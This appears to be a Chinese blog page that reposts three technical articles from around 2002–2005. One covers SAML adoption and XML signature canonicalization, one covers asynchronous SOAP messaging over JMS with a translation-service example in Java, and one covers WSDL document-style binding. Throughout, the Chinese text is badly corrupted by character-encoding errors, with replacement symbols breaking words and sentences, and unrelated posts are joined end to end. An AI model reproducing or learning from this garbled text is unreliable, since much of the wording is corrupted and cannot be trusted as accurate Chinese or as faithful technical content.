许多商业和开放源码��品中已经提供�?SAML�Q�包括：

IBM Tivoli Access Manager
Oblix NetPoint
SunONE Identity Server
Baltimore, SelectAccess
Entegrity Solutions AssureAccess
Internet2 OpenSAML
Netegrity SiteMinder
Sigaba Secure Messaging Solutions
RSA Security ClearTrust
VeriSign Trust Integration Toolkit
Entrust GetAccess 7

误解�Q�Microsoft 不支�?SAML�?/SPAN>
目前�q�不清楚 Microsoft ��如何支�?SAML�Q�但�?Microsoft �?OASIS ��组正在�q�行大量工作�Q�以使得 SAML �?Microsoft 的倡议相协调。Microsoft 的��^台和服务�Q�包�?Microsoft .NET Passport�Q�将如何与那些实�?Liberty Alliance �?OASIS WS-Security ��目协议的服务相互操作，�q�需拭目以待。例如，�?Passport 的专有系�l�不同，Liberty Alliance 认证规范使用 SAML 标记来交换认证标记。但是，�q�两�U�认证系�l�在��标��C��一个站点传递到下一个站点的方式上有所不同�?/P>
Microsoft 已公开承诺�?WS-Security 路线囑ַ�作和 SAML ��目合理化。他们似乎更侧重于以 WS-Security 作�ؓ更通用�?Web 服务安全性模型，该模型可以��用现有的 IT 投资以及新兴标准�Q�如 SAML �?XrML�Q�。Microsoft 正在�?OASIS WS-Security ��组通力合作�Q�以使用 SAML 断言作�ؓ WS-Security 凭证。最�q�，OASIS WS-Security ��组接受�?SAML �?WS-Security �l�定�?/P>
��管 Microsoft �?OASIS WS-Security ��组无控制力�Q�但 Chris Kaler 是该工作�l�的��d��之一�Q�同时也�?Microsoft 员工。我认�ؓ�Q�如�?Microsoft 对于��?SAML 用于 Passport �?Liberty Alliance 只想得到形式上的认可�Q�那�?Microsoft �q�不如向 ECMA 标准团体提供��?/P>
误解�Q�XML �{�֐�中的规范化是不需要的�?/SPAN>
�q�完全错了�?/P>
XML �{�֐�是一�U�规范，旨在满��?XML 文��Q�包�?SAML�Q�与数字�{�֐�一起��用的�Ҏ��需求。W3C �?XML �{�֐�工作�l�正在开发一�U?XML 语法�Q�以便于可以对几乎�Q何内容进行签�?�?XML 文��、SOAP 消息头和 XML 元素�Q��ƈ且提供用于创建和验证数字�{�֐�的协议和�q�程�?/P>
XML �{�֐�中的规范化是允许在多个服务之间进行认证所必需的。例如，误��虑当您通过��览器界面从刉��商那里购买个�h计算机时�Q�服务器端所发生的情形。多个服务处理订单的不同部分�Q�一个服务提供搜索功能以扑ֈ�您希望订购的产品�Q�下一个是开帐单服务�Q�它获取您的支付信息�Q�最后一个服务获取装�q�信息。这三个�pȝ��使用 SAML 断言�׃�n您的记录。规范化��保了您记录中的字节��序保持相同�Q�即使三个不同系�l�正在操作该记录也是如此。如果没有规范化�Q�那么该记录��可能会发生变化�q�� XML �{�֐�无效�Q�因�?XML �{�֐�的�Q务是��保其签名的内容是完好无损的�Q��ƈ且字节顺序是相同的�?/P>
�l�束�?/SPAN>
�׃��许多致力于安全性的公司已经提供了上市的产品�Q�因�?SAML 有一个良好的��L��。SAML 规范为在一�l�联合服务中设计支持 Web 的、单点登录的服务提供了良好的框架。SAML 规范工作�l�的工作�q�在�l�箋�Q�以使得 SAML 和其它新兴标准（包括 WS-Security�Q�之间的互操作性需求合理化�?/P>
作者感�?Charles Knouse�Q�Oblix 的首席��Y件工�E�师�Q�和软�g开发论坛（Software Development Forum�Q�www.sdforum.org�Q�的 Web 服务特别兴趣�l�（Web Services Special Interest Group�Q�，感谢他们为研�I�本文所提供的帮助�?/I>

参考资�?

您可以参阅本文在 developerWorks 全球站点上的英文原文.

请在 OASIS 联盟站点上阅�?SAML 规范�?

��h��?Murdoch Mactaggart �?developerWorks文章 Enabling XML security�Q�这��文章非常出色地介绍�?XML 加密�?XML �{�֐��Q?001 �q?9 月）�?

请了解即��出现的 Web 服务安全性协议的工作原理 �?请在 developerWorks上阅�?��Z�� XML 的��o牌的 WS-Security 概要文�g�Q?002 �q?8 月）�?

通过 Jon Udell 有关 SAML �?PKI �?InfoWorld 文章了解更多背景知识�?

请下�?alphaWorks�?XML Security Suite�Q�以获得一�?XML 数字�{�֐�的实现�?

请回�儡�� Frank Cohen 所撰写�?前一��文�?/A>�Q�以了解先于 Web 服务��行�?XML 单点��d��Ҏ��Q?developerWorks�Q?002 �q?1 月）�?

�?developerWorksXML 专区上找到更�?XML 参考资料�?

误��?IBM WebSphere Studio�Q�这是一个�� XML 开发自动化的工��P��可以使用 Java 语言和其它语�a��q�行开发。它�?WebSphere Application Server紧密集成�Q�也可以与其�?J2EE 服务器一起��用�?

了解如何成�ؓ一�?IBM 认证�?XML 及相��x��术的开发�h�?/A>�?

关于作�?/SPAN>
Frank Cohen 是一�?“上门服务�?/I>人士�Q�当企业需要测试和解决复杂的互操作信息�pȝ��Q�特别是 Web 服务�Q�中的问题时�Q�他可以上门服务。Frank �?PushToTest�Q�一家测试自动化解决�Ҏ��公司�Q�的创始人和几本有关��试信息�pȝ��的书�c�的作者。Frank 最�q�出版的��C�� Automating Web Tests with TestMaker现在可在 http://www.pushtotest.com/ptt扑ֈ�。可以通过 fcohen@pushtotest.com与他联系�?

�W�笨 2005-09-29 09:20 发表评论

�W�笨 — Mon, 22 Aug 2005 01:19:00 GMT
http://www.ftponline.com/china/XmlFile.aspx?ID=258

见资�?/A>
��异步消息传递（如Java Message Service�Q�与SOAP�l�合��h��意味着Web services可以有更多的用途�?/B>
by David Chappell and Tony Hong
直到最�q�，Web services的用途一直集中于通过HTTP实现的同步请�?回应模式�Q�request/reply model�Q�。这是很自然的，因�ؓWeb services的第一个用例就是集中在Remote Procedure Call�Q�RPC�Q�和分布式组件交互的。然而，Web services的这�U�应用情况忽视了当今IT前景的一个重大的斚w��Q�异步消息传递（asynchronous messaging�Q�，它有很大的�h��|��因�ؓ它给数据传输和处理带来了一定的可靠性和灉|��性，�q�些性能是同步消息传递很隑֮�现的。通过异步消息传输机制�Q�如JMS�Q�，把异步消息传递同SOAP�l�合��h��可以将如今的Web services标准应用到更�q�的领域�?/P>
��这�U�技术结合用于重要的企业集成环境是最受欢�q�的了。该领域一直是由Electronic Data Interchange �Q�EDI�Q�、Enterprise Application Integration�Q�EAI�Q�和B2B�l�治的——然而IT�C�֛�一直在��L��成本更低、更高效、更��Z��标准的方法。在�q�些领域中，用即时的同步RPC来换取一些功能会让我们更满意�Q�这些功能包括可靠的传递能力、更适合面向企业交易的松散耦合的、粗�_�度的（coarse-grained�Q�接口；面向文档的异步交互和寚w��讯协议和传输机制的支持�?/P>
让我们看看JMS是如何成��Z��U�可靠的异步SOAP消息传递的�Ҏ��的。我们也��探讨如何将JMS用于可靠的Web services调用。（你可以在�q�里下蝲样例代码�Q�注意，你需要接受一个许可协议�ƈ�?A target=_blank>www.xmethods.net�|�站上注册。）

�?. 多方同步通讯
许多Web services都运用一个同步的RPC模式�Q�在�q�个模式中，服务呈现�l�粒度的�Q�fine-grained�Q�接口，而且一个Web services客户端调用RPC型（RPC-style�Q�的交互。在一个RPC型的环境中，参与一个单独的通讯��程的所有的应用�E�序和服务都必须是可用的�Q�以使多斚w��讯成功。在有些情况下，同步模式是必需的，比如当服务传递的信息在本质上是实时的�Q�如详细目录查找�Q�时候。然而，�q�种同步处理是一�U�要么全有要么全无的�Q�all-or-nothing�Q�命题。如果由于某�U�原因不能得��C��个下行的�Q�downstream�Q�服务，那么提出��h��的应用程序及其上行的�Q�upstream�Q�参与者就需要处理应用程序代码中的错误（�?A href="javascript:openWindowRes('XML/2003_02/xml2html.asp?xmlfile=FlexibleWS/Figure1.xml&xslfile=../../include/xsl/Figure.xsl');">�?�Q��?/P>
可靠的异步通讯是指�Q��ؓ了保持整个环境的健全�Q�系�l�的所有方面不需要在��M��特定的时候都是可用的。即使对于一个简单的两方客户�?服务�Q�client/service�Q�交互来��_��q�用可靠的异步通讯��意味着�Q�当客户端对服务提出��h��Ӟ��被调用的服务不需要是可用的。客��L��请求传递到一个可靠的异步传输机制中，该请求暂时不能与服务�q�行对话。然后客��L��本��n变成不可用的�Q�当服务成�ؓ可用的时�Q�就可以�q�行服务调用了�?/P>
处于�{�待状态的�Q�pending�Q�交�?/FONT>
异步交互也不需要客��L��{�待响应。一个Web service端点�Q�end point�Q�可以代表一个应用程序，它需要一些时间来执行计算、查找或转换�{��Q务。对一个服务提出异步请求的客户端可以��l�执行其它�Q务，同时其Web service交互处于�{�待状态。这��提高了�q�行性（concurrency�Q�和可扩展性�?/P>
�l�粒度的RPC型的接口需要每个应用程序和服务都知道它们是如何同其它应用程序和服务�q�行通讯的。例如，一个订单接口上可能有诸如getQuantity()、getTotal()或getBillToAddress()�{�方法�?/P>
�_�粒度、文本型�Q�document-style�Q�的接口是指�Q�每个应用程序或服务只需要关心封装的XML文档�Q�该XML文档包含所有相关的信息�Q�服务可以与其它感兴��者共享这些信息，�q�可以以SOAP envelope的�Ş式将�q�些信息发送给他们。同��P��在��用服务时�Q�我们可以从XML文档选择相关的数据（例如地址�Q�，�q�行相应的处理，然后��结果发送到其它目的地。当你将异步交互同文本型、粗�_�度的接口结合�v来时�Q�你��׃ؓ消息传递�Ş式的调用做好了主要准备了�?/P>

�?. 消息队列
得到可靠的异步通讯的最明智的方法就是运用基于JMS的消息队列。JMS是个标准�Q�它提供了一�l�通用API让应用程序��用，�q�提供了一�l�通用的消息传递语义，如确保消息传递、消息一定会被传递且仅传递一�ơ（once-and-only-once delivery�Q�。JMS��其性能和执行原则封装在自己的层中，�q�个层是同应用程序层分离的。一个将��Z��JMS消息传递系�l�作��Z��输机制的应用�E�序不需要关心消息是如何传递的。SOAP消息可以在发送者和接收者之间列队等待（�?A href="javascript:openWindowRes('XML/2003_02/xml2html.asp?xmlfile=FlexibleWS/Figure2.xml&xslfile=../../include/xsl/Figure.xsl');">�?�Q�。JMS提供者负责处理异步、消息持�l�性、交易完整性和接收��认�{�所有方面�?/P>
Java 2 Platform、Enterprise Edition�Q�J2EE�Q�架构图��L��JMS看做是个隐藏在防火墙后面的组�Ӟ��通过它我们在一个JSP servlet引擎和消息驱动的bean之间异步��C��递消息。如果你在制作Web��面�q�将它们同中间层商业逻辑�l�合��h��Q�那么这个架构就是个有效的用例，但这�q�不是运用消息传递的唯一的方式�?/P>
JMS消息传递机制是跨Internet传递数据、SOAP或其它信息的一个完全可行的解决�Ҏ��。一个JMS机制可以在哪里部�|�以及如何部�|�的�l�节取决于供应商。许多JMS供应商都提供某种通道性能�Q�tunneling capabilities�Q�。例如，在SonicMQ例子中，JMS客户端到JMS服务器的通讯可以很容易地跨越公开的Internet、跨��防火墙、以一�U�运用HTTP、HTTPS、SSL或TCP sockets的安全的、可靠的方式�q�行�?/P>
��JMS作�ؓ一�U�SOAP传输机制
�?998�q�被引进��C��界以来，JMS��׃��Z��U�基于标准的消息传递方法，在应用程序之间传输SOAP消息。它有五�U�消息类型，可以传递�Q何类型的数据�Q�基于XML或不��Z��XML�Q�。XML数据可以很容易地作�ؓ一个JMS BytesMessage中的二元数据或作为TextMessage中的串数据（string data�Q�来传递�?/P>
不管对话两端�q�用何种API�Q�我们把传输层上�q�用的JMS看做是除了普通的、老的HTTP传输之外的另一�U�可选方法。在我们的例子中�Q�我们将JMS的API和Apache SOAP�l�合��h��了——运用JMS API来连接、发送和接收消息�Q�运用Apache SOAP来徏构（construct�Q�和析构�Q�deconstruct�Q�SOAP envelope。在不久的将来，JMS��作��Z��个传输层被嵌入到Apache Axis中。JMS��会成�ؓ一个部�|�选项�?/P>
JMS也有一个内�|�的同步��h��/回应模式。这个请�?回应模式也可以异步地工作。请求者不需要block��h��Q�等待即时的响应。响应可以在�E�后的时间异步地发送。JMS可以使最初的��h��消息同相应的响应消息兌��h��Q�即使请求和响应在时间上是分��ȝ��Q�或者即使请求过�E�在��p�|后又恢复正常�?/P>
XMethods中列出的BabelFish服务�l�AltaVista的很受欢�q�的BabelFish��译工具提供了一个典型的PRC SOAP接口�Q�见资源�Q�。下面我们来看一下这个Web service的一个异步版本，�U�CؓAsynchBabelFish�?/P>
从根本上��_��该服务主要是异步交换SOAP文��。客��L��l�服务发送一个AsynchBabelFish转换��h��文��Q�一�D�|��间后�Q�服务将一个AsynchBabelFish转换�l�果文��发送回客户端。交换是在消息队列上完成的。从�q�个��单的例子�Q�我们可以看到的一个明昄��好处��是�Q�即使服务出了问题，客户端也不会受媄响；它可以将��h��攑ֈ�服务队列中，该请求是肯定可以被完成的——即使不是在现在�Q�在�E�后旉��服务恢复正常时就可以完成。而且�Q�运用一个异步模式也可以�l�客��L��和服务器提供很多的灵�z�L��，使它们可以控制消息的处理速度�Q�例如，服务器可以从服务队列取出消息�Q�按自己的意愉K��时处理它们�?/P>
在客��L��和AsynchBabelFish服务之间可能交换了三个文��：从客��L��发送到服务的�{换请求文档、从服务发送回客户端的转换�l�果文档、以及如果请求出了问题或如果转换��h��׃��某种原因不能完成�Q�发送回客户端的一个替代结果文��的SOAP fault envelope�?/P>
要对AsynchBabelFish服务提出一个请求，客户端需要将转换��h��文��创徏成一个字�W�串�Q��ƈ��它作�ؓ一个TextMessage列在AsynchBabelFish服务��h��队列中。Envelope采用的�Ş式见列表1�?/P>
转换��h��envelope的body部分包含SourceText元素�Q�它带有用户惌��转换的文本。Xml:lang属性�ؓ文本语言指定了编码，traslateTo属性�ؓ用户惛_��文本转换到的语言指定了编码。所支持的语�a�包括English�Q�en�Q�、German�Q�de�Q�、French�Q�fr�Q�、Italian�Q�it�Q�和Portuguese�Q�pt�Q�。对于源文（source text�Q�，�?50个字的限制�?/P>
注意SOAP header中运用的WS-Security header元素。AsynchBabelFish服务要求对XMethods用户ID/密码数据库进行验证，该元素用来提供请求者的�w�䆾凭证�Q�credentials�Q�。（关于WS-Security的更多信息，请参�?A href="javascript:openWindowRes('XML/2003_02/xml2html.asp?xmlfile=FlexibleWS/Resources.xml&xslfile=../../include/xsl/Resources.xsl');">资源。）转换�l�果envelope的body部分包含两个子元素，SourceText和TranslationText。例如：

hello bonjour

SourceText只是重复传递到��h��的内宏V��TranslationText包含转换的文本及其语�a�的xml:lang指示�W�。如果请求envelope有问题，从而不可能完成��h��Q�就会返回一个标准的SOAP fault envelope来替代�{换结果文��。下面的例子昄��的是SOAP fault envelope�Q�如果请求消息带有的TextMessage不是格式规范的XML�Q�那么这个特�D�的fault��׃��被发送回客户端：

soap:Client Incoming text is not XML

通过一个基于JMS的Web service�Q�如AsynchBabelFish�Q�，客户端和服务器就不是直接�q�行交互的了�Q�取而代之的是，SOAP��h��可以通过消息队列在客��L��和服务器之间�q�行传递，而不受时间的影响�Q�time-independent�Q��?/P>
现在�Q�让我们看看一个消息是如何从客��L��传递到服务器的�Q�见�?�Q�。客��L��创徏一个�{换请求envelope�Q��ƈ��它攑֜�该服务的��h��队列中。服务的所有客��L��都可以运用这个众所周知的公用队列，如同��Z��HTTP的服务运用固定的、众所周知的HTTP端点URL一栗��客��L��也给��h��消息提供了一个reply-to JMS header�Q�它包含一个响应队列的名字�Q�从而让服务知道��响应消息发送到哪里。AsynchBabelFish服务�q�程是否立即完成同该步骤�Q�将��h��攑օ�队列�Q�是无关的�?/P>

�?. ��h��消息的过�E?/A>
然后�Q�服务从队列得到��h��。该步骤可以是在客户端放�|�请求后立即实现的，也可以在�E�后旉��完成�Q�取决于服务器什么时候做好准备接收请求。然后服务器处理��h��。如果请求在某些斚w��是无效的——例如，它可能不是一个有效的��h��文档�Q�或它可能用了不被支持或无效的语�a��~�码——那么它��׃��生成一个SOAP fault envelope�Q�其中详�l�说明出了什么问题。否则，服务��执行�{换�ƈ生成适当的结果文档。如果在转换�q�程中出��C��h��本��n的有效性无关的技术错误，那么��h��׃��留在队列中，服务定期重试它们。最后，服务器就通过响应队列�l�客��L��q�回一个响应消息（�?A href="javascript:openWindowRes('XML/2003_02/xml2html.asp?xmlfile=FlexibleWS/Figure4.xml&xslfile=../../include/xsl/Figure.xsl');">�?�Q��?/P>
��试
服务��{换结果文��（或SOAP fault�Q�放在JMS reply-to指定的响应队列中。它包含JMS��h��消息的ID�Q��ƈ讄��相关的响应消息ID来匹配它�Q�因此客��L��可以根据其意愿�q�行相应的请�?响应操作了。然后，在需要的时候，客户端就可以从响应队列得到完成的转换�l�果文��了（或SOAP fault�Q��?/P>

�?. 处理响应消息的过�E?/A>
你自己可以尝试调用AsynchBabelFish服务。（要访问AsynchBabelFish的client package和相关的JMS client libraries�Q�请参阅www.xml-mag.com上的在线资源。）�q�个包（package�Q�包括客��L��源代码、二�q�制代码和它所依赖的第三方�c�d��Q�libraries�Q�。要�q�用�q�个客户端，你也需要创��Z��个XMethods帐号�q�请求你自己的响应队列（XMethods�l�它的用��h��供了一个作为messagebox的响应队列，它是对该服务以及未来引发的异步服务所做的SOAP响应�Q�。客��L��下蝲包所包含的指南对�q�些步骤的每一步都提供了更详细的说明。Client package中的源程序文件在�?中有��要的说明�?

TranslatorRequestor可以让你创徏��h��q�将它发送到AsynchBabelFish��h��队列中（�?A href="javascript:openWindowRes('XML/2003_02/xml2html.asp?xmlfile=FlexibleWS/List2.xml&xslfile=../../include/xsl/MyList.xsl');">列表2�Q�。其�q�行如下所�C�：

java asynchBabelFish. TranslatorRequestor

让我们来看看TranslatorRequestor的一些重炏V��首先，�E�序实例化一个到AsynchBabelFish服务队列的JMS�q�接。然后实例化一个RequestEnvelope对象�Q?

RequestEnvelope requestEnv= new RequestEnvelope(userID, password,sourceText, sourceLanguage,toLanguage);

RequestEnvelope对象带有你传递的参数�q�在内部构造一个SOAP envelope。然后，当你调用它的toString()�Ҏ��Ӟ��它就会以字符串�Ş式给你返回一个相应的转换��h��SOAP文��。我们用�q�个字符串创��Z��个JMS TextMessage对象�Q?

TextMessage message= queueSession.createTextMessage( requestEnv.toString());

��响应队列的句柄�Q�handle�Q�添加到消息的JMS reply-to header�Q?

// Get a handle to the reply-to // queue Queue replyToQueue=queueSession. createQueue(replyToQueueName); // and add it to the reply-to // field message.setJMSReplyTo( replyToQueue);

形成的结果消息就会在控制台打印出来�ƈ发送到服务队列。在�q�个例子中，你可以看刎ͼ�被调用的TranslatorRequestor�E�序用了一个我们设�|�的��试帐号“joe”和一个测试响应队列（testResponseQueue�Q�（�?A href="javascript:openWindowRes('XML/2003_02/xml2html.asp?xmlfile=FlexibleWS/Figure5.xml&xslfile=../../include/xsl/Figure.xsl');">�?�Q��?/P>

�?. ��h��转换
然后服务器处理消息，�q�回一个�{换结果文档或一个SOAP fault。ReplyProcessor�E�序负责处理响应消息�Q�见列表3�Q�。在�q�个例子中，我们用了一个与��h��E�序不同的程序来处理响应消息�Q�尽��这�q�不是必需的。ReplyProcessor的调用方式如下所�C�：

java asynchBabelFish. ReplyProcessor

�E�序首先建立一个到命��o行参数所指定的响应队列的JMS�q�接。然后它��自己注册�ؓ那个队列的一个listener。在典型的JMS消息传递模式中�Q�传送的消息被反馈到ReplyProcessor 的onMessage()�Ҏ��?/P>
得到有趣的信�?/FONT>
对于�q�入响应队列的每个新消息�Q�onMessage()都从消息中读取SOAP envelope�Q�以一个TextMessage的�Ş式）�Q�然后将来自TextMessage的字�W�串传递到ResponseEnvelope构造器中：

ResponseEnvelope response= new ResponseEnvelope( ((TextMessage)message). getText());

ResponseEnvelope�Q�见列表4�Q�是个辅助类�Q�helper class�Q�，它可以让我们更容易地处理转换�l�果文档。它的构造器以字�W�串形式��d��SOAP XML�Q��ƈ实例化一个Apache SOAP Envelope对象�Q�它用get()�Ҏ��处理�q�个对象来提取有��的参数�Q�源文本、�{换文本等�{�）。它的toString()�Ҏ��也可以让你得到SOAP消息的源XML文��。然后响应消息和SOAP文��本��n的相关ID�Q�correlation ID�Q�就被打印出来了�Q?

// The correlation ID matches the // JMS Message ID of the original // request message System.out.println("\nResponse: JMS Correlation ID = "+message. getJMSCorrelationID()+"\n"); // Print out the response SOAP // envelope System.out.println(response);

最后，从�{换结果文档中打印出我们感兴趣的四个参敎ͼ�源文本、源语言、�{换文本和转换语言�Q?

// And print out a summary of the // translation. System.out.println("\""+response. getSourceText()+"\" ( "+response.getSourceLanguage() +") translates to \""+response. getTranslationText()+"\" ( "+response. getTranslationLanguage() +")\n\n");;

如果传送的消息的确产生了一个SOAP fault�Q�而不是一个有效的转换�l�果文��Q�那么要实例化ResponseEnvelope��׃��抛出一个异常，会从SOAP fault中�Ş成错误字�W�串�Q��ƈ打印出对那个异常的堆栈跟�t�（stack trace�Q�（�?A href="javascript:openWindowRes('XML/2003_02/xml2html.asp?xmlfile=FlexibleWS/List5.xml&xslfile=../../include/xsl/MyList.xsl');">列表5�Q�。当�E�序�Ҏ��们先前用TranslatorRequestor发送的��h��的响应文��进行处理时�Q�你��可以看到程序的�l�果�Q�见�?�Q��?/P>

�?. 处理响应消息
RPC机制限制了Web services的有效性。异步消息传递以及它同Web services整合的�h值就在于�Q�SOAP和更高��的Web services协议是独立于传输机制�Q�transport-neutral�Q�的�Q�对于分布式计算�Q�distributed computing�Q�来��_��没有通用的（one-size-fits-all�Q�方法。JMS提供了可靠的异步传输�Q�这�U�传输可以与其它受欢�q�的SOAP堆栈一��P��或隐藏在�q�些SOAP堆栈下）跨Internet实现�?/P>
不管你选择哪种SOAP客户端类库，你都需要考虑如何�q�用异步消息传递来在企业内部或跨企业实现有效的数据传输。AsynchBabelFish例子可能�q�不是你在日常工作中使用或实现的那种服务�Q�但它的��说明了SOAP是如何同JMS整合在一��L��?/P>
关于作�?
David Chappel是Sonic Software的副��d��主要技术传播者。他也是Java Web Services (O’Reilly & Associates, 2002)、Professional ebXML Foundations (Wrox, 2001)和The Java Message Service (O’Reilly & Associates, 2000)的合著者。最�q�，他获得了Java Pro杂志的“Java Community个�h杰出贡献奖”（误��?A target=_blank xmlns:fo="http://www.w3.org/1999/XSL/Format">www.sonicsoftware.com�Q�。Tony Hong是Xmethods的合著者，是Web services目录的出版商�Q�请讉K��www.xmethods.net�Q�。Dave的联�p�L��式是chappell@sonicsoftware.com�Q�Tony的联�p�L��式是thong@xmethods.net�?BR xmlns:fo="http://www.w3.org/1999/XSL/Format">

�W�笨 2005-08-22 09:19 发表评论

�W�笨 — Mon, 22 Aug 2005 01:19:00 GMT

内容�Q?/B>

��您的服务设�|��ؓ使用文档样式

文档样式的好�?/A>

何时使用文��样式

�l�束�?/A>

参考资�?

关于作�?/A>

�Ҏ��文的评�h

相关内容�Q?/B>

使用 WSDL 部��v Web 服务

订阅:

developerWorks 时事通讯

http://www-128.ibm.com/developerworks/cn/webservices/ws-docstyle/

James McCarthy
总裁兼首席技术执行官, Symmetry Solutions�Q�Inc.
2002 �q?6 �?

大部�?Web 服务都是围绕着�q�程�q�程调用而构建的�Q��?WSDL 规范允许另外一�U?Web 服务体系�l�构�Q�文��样式（document style�Q�。在该体�pȝ��构中�Q�整个文��在服务客户端和服务器之间进行交换。在本文中，James McCarthy ��向您解释文档样式以及应该何时��用它�?/BLOCKQUOTE>
�?Web 服务描述语言�Q�Web Service Definition Language�Q�WDSL�Q�规范中隐含着一个非常��y妙的转换开养I��它可以将 Web 服务�?SOAP �l�定从远�E�过�E�调用�{换成 pass-through 文��。在 SOAP 协议�l�定中的样式属性可以包含这两个��g��的一个： rpc �?document 。当属性被讑֮�为文��样式时�Q�客��L��知道应该使用 XML 模式而不是远�E�过�E�调用约定。本文将提供对这�?WSDL 转换开关的说明�Q�描�q�它的好处，�q�将解释应该何时使用 pass-through 文��?

��您的服务设�|��ؓ使用文档样式
首先�Q�让我们��要地谈谈 WSDL 的一些要点，来理解这个��y妙的转换是如何发生的�?WSDL 是一��?XML 规范�Q�它被用来描�q�网�l�服务以及对于到辄��点（服务�Q�的协议相关的需求。WSDL 用抽象术语来描述服务�Q�通过可扩展的�l�定定义�Q�它能够��Z��用具体术语调用服务定义协议和数据格式规范。下面的语法是直接从 WSDL 规范中摘录出来的�Q�展�C�Z��在绑定中所包含的可扩展性元素：
清单1. 用于�l�定中的扩展元素�?WSDL 语法

* <-- extensibility element (1) --> * * <-- extensibility element (2) --> * ? <-- extensibility element (3) --> ? <-- extensibility element (4) --> * * <-- extensibility element (5) --> *

WSDL 规范�Q�请参阅参考资�?/A>部分以获得相关链接）通常描述三种�l�定扩展�Q�HTTP GET/POST、MIME 以及 SOAP version 1.1。HTTP GET/POST �?MIME 中定义的�l�定扩展用来定义与标准的 Web 应用�E�序�q�行通信的需求，�q�些应用�E�序可能�q�回�Q�也可能不返回）XML 文��。在发送或�q�回 XML 文��Ӟ��HTTP GET/POST �l�定的扩展是隐式的文��样式�?

SOAP �l�定扩展用来定义支持 SOAP 信封协议的服务。SOAP 信封是一�U�简单模式，它设计成能包�?XML 消息�Q�提供特定于应用�E�序的消息头和消息体。SOAP �l�定的扩展�� WSDL 文档能够声明 SOAP 消息的需求，�q�样应用�E�序��p��够与服务正确通信。SOAP 扩展允许��?SOAP 消息的样式声明�ؓ文��?RPC。如果在 soap:binding 元素中声明了样式属性，那么该样式将成�ؓ所有没有显式声明的样式属性的 soap:operation 元素的缺省倹{��如果在 soap:binding 元素中没有声明样式属性，那么�~�省的样式就是文��。下面是文��样式的显式声明：

不管 soap:binding 元素中的声明如何�Q?soap:operation 元素可以覆盖每个操作的声明，��像�q�样的：

在声明了文档样式�?SOAP 消息中，原始�Q�as-is�Q�或�~�码�Q�encoded�Q�的消息被直接放�|�在 SOAP 信封的体部。如果样式声明�ؓ RPC�Q�消息就��装在包装器元素中，同时带有从操作名属性中提取的的元素的名�U�C��及从操作名称�I�间属性中提取的名�U�空间�?/P>
文��样式的好�?/SPAN>
勿庸�|�疑�Q��?XML 调用跨��^台的�q�程�q�程调用的能力是非常有用的，它是使用 Web 服务的非常有说服力的理由。但是如�?Web 服务仅仅局限于 RPC 消息传递，�q�项技术的影响��是有限的。幸�q�的是，开发�h员可以选择是��?RPC �q�是文��样式的消息传递，�q�且能够使用适合的技术来完成他们面��的�Q务�?

使用文��样式�Q�您可以充分利用 XML
XML 规范开发用来��通常锁定于专有格式的常规数据可以以一�U��h易读的、自描述的、自验证的开放格式来描述。当 Web 服务使用文��消息传递时�Q�它可以利用 XML 的全部能力来描述和验证高�U�业务文��。当服务使用 RPC 消息格式化时�Q�XML 描述�Ҏ��以及为方法调用编码的参数�Q�但是却不能用来执行高��业务规则。�ؓ了执行这些规则，RPC 消息必须包含 XML 文档作�ؓ字符串参数�ƈ且在被调用的�Ҏ��中隐藏验证。出于这个原因，XML 的某些好处就丧失了，或者至��是被隐藏在后台应用�E�序里了�?

文��样式无需严格的契�U?/SPAN>
使用文��消息传递的另外一个原因在于，�q�程�q�程调用必须是相寚w��态的�Q��ƈ且对接口的�Q何变化都��破坏服务和应用�E�序之间的契�U�。如果服务是�q�泛分布的，那么很可能大量的应用�E�序已经从它�?WSDL 文��中��生了存根代码。改�?WSDL ��会��D��所有依赖于特定�Ҏ��{�֐�的应用程序被破坏�Q�而且许多支持行��生问题。好的设计要�?RPC 消息服务的方法签名不应该改变。��用文档消息传递，规则更不严格�Q��ƈ且可以�� XML 模式得到显著增强和改变，同时又不会破坏调用应用程序�?

文��样式更适合于异步处�?/SPAN>
当业务��用基�?Web 的应用程序通过 Internet 交换信息�Ӟ��应用�E�序应该能够使用有保证的交付机制来提高它的可靠性、可伸羃性和性能。�ؓ了达到这个目的，应用�E�序通常��用异步消息队列。由于文��消息通常是自包含的，所以它更适合于异步处理，�q�且可以直接攑ֈ�队列中。之所以说应用�E�序的可靠性得��C��提高�Q�是因�ؓ即��目标应用�E�序当前不是�z�d��的，消息队列也可以保证消息的交付�Q�之所以说性能得到了提高，是因�?Web 应用�E�序只是把文��发送到队列中，然后便可以自由地执行其他的�Q务；之所以说可扩展性得��C��提高�Q�是因�ؓ文档被下传到一个或多个应用�E�序的实例以�q�行处理�?

文��样式使对象交换更加灵�z?/SPAN>
业务文��的设计通常很好地适于面向对象的体�pȝ��构。结果，两个应用�E�序可以设计成通过使用 XML 交换对象的状态。与对象序列化相比，在对象交换中�Q�交换的每个端点都可以自由地设计它认为合适的对象�Q�只要交换符合达成协议的 XML 文�g格式卛_��。不使用对象序列化的一个原因是��Z��支持对象在客��L��和服务器端的实现。许多现有的特定于行业的 XML 模式被设计成客户�?服务器体�pȝ��构，在这�U�体�pȝ��构中�Q�在客户端上完成的处理与预定在服务器上完成的处理是分��ȝ��。通常的情冉|��Q�客��L��仅仅以服务器要求的特定文��格式请求或保存信息。当�Ӟ��q�种�c�d��的交换也能用 RPC 消息完成�Q�但是这�U�消息的�~�码方式限制了每个端点上的对象的设计。在文档样式中就不会出现�q�些限制问题�?/P>
何时使用文��样式
什么时候应该��用文��样式呢�Q�简单地��_��只要没有�q�接到已存在的远�E�过�E�调用，��M��时候都可以使用文��方式。��用文档方式比起通常��p��额外的工作来�q�接服务�Q�好处要大得多。不�q�需要提醒的是：一般来��_��构徏一个��用文档消息传递的服务的工作量要比构徏一�?RPC 消息服务所需的工作量大。这些额外的工作通常包括 XML 模式的设计或对已存在的模式的支持、以及从文档中提取相关的信息。模式设计是重要的，因�ؓ XML 解析器��用这个模式来验证文档�Q�支持预定的业务规则。服务需要进行额外的工作来从文档中提取用于处理请求的相关信息。相比之下，RPC 消息只需要设计方法的接口�Q�通过�Ҏ��的接口，RPC 消息��可以自动地�~�组和解�l�参数�?

当您军_��发布一��Ҏ��务时�Q�您可能应该考虑下列问题。我��在下面的部分中分析您的�{�案的结果�?/P>

�q�项服务是连接到已存在的�q�程调用�Q��ƈ且这个过�E�调用是无状态的吗？
�q�项服务是仅在您的组�l�内部��用，�q�是也可以被外部用户所使用�Q?
参数之一仅仅�?XML 文档规范吗？
�q�项服务需要请�?响应体系�l�构吗？
参数表示了可以从用于验证�?XML 文��模式受益的复杂结构吗�Q?
所有需要进行交换的信息都能够合理地存放在内存中吗？

在维护应用程序状态时使用文档样式
